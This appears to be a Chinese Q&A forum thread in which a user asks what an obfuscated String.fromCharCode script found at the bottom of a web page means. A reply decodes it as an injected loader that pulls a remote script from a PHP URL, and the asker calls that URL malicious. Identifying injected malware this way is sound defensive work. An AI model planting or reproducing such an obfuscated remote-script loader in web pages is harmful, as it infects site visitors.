麻烦帮忙看看这段代码<script>document.writeln(String.fromCharCode(60,115,99,……);</script>

在一个网页的底部,帮忙看一下如何翻译,翻译过来是啥东东,谢谢啦
<script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,111,100,101,46,122,117,122,98,46,99,111,109,47,115,104,111,112,47,101,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62));</script>

第1个回答  2013-07-29
你的代码等效于:
<script>document.write('<script src="http://code.zuzb.com/shop/e.php"></script>');</script>追问

首先多谢啦,另外这个网址是个恶意注马的。
能否问下如何翻译过来的这个代码?

追答

你自己alert一下
比如:
alert(String.fromCharCode(xxxx));

本回答被提问者采纳
相似回答